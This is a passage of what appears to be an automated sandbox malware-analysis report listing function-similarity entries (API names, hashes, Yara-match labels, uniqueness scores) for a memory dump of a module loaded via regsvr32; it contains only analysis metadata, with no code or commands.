                                    • API String ID: 3050416762-3829454487
                                    • Opcode ID: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                    • Instruction ID: 9ccfc4099f9371cda73c12f66118d6bd88d16b35f011f4316eea9315b8229921
                                    • Opcode Fuzzy Hash: 33421f65957b2cee526031f8a07a804c17c2d95f214975574550df922f90e764
                                    • Instruction Fuzzy Hash: B741E57050C7888FD778DF28D08579AB7E0FB98355F504A2EE88DC7256DB749844CB46
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: HttpOpenRequest
                                    • String ID: /w?
                                    • API String ID: 1984915467-2883141396
                                    • Opcode ID: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                    • Instruction ID: 62644a68fcffc2b577fce7b544f847534cb1236eece225f9d3186d00a7134b33
                                    • Opcode Fuzzy Hash: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                    • Instruction Fuzzy Hash: 82414B7051CB848BDBA4DF18D08979AB7E0FB98315F10495EE48CC7296DB789888CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID:
                                    • API String ID: 2039140958-0
                                    • Opcode ID: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                    • Instruction ID: a7a4fb0533c75889cab630729e0b0d9f2a38dc76e554bad22bb68829b1652ebe
                                    • Opcode Fuzzy Hash: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                    • Instruction Fuzzy Hash: AB412C705187808FEB78DF18D48A79AB7E1FB98305F104A5DE88DC7396CB789844CB46
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                    • Instruction ID: ac55bdb39f8b4cda225445b8a297a6fe4d60e7d5d7af93594b9ed55c6b81ea6e
                                    • Opcode Fuzzy Hash: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                    • Instruction Fuzzy Hash: B941047061C7848FC7A8DF18D08579AB7E0FB98304F10895EE88DC7256DB709988CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                    • Instruction ID: 3f2c7be81e2b52442973c9c793e7ddf499cdb82d70e50cd1cb8991bbce4e9b94
                                    • Opcode Fuzzy Hash: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                    • Instruction Fuzzy Hash: 4F316970A1CB848FD768DF28D48A75AB7E0FB98304F100A1EF588C7252CB74D904CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%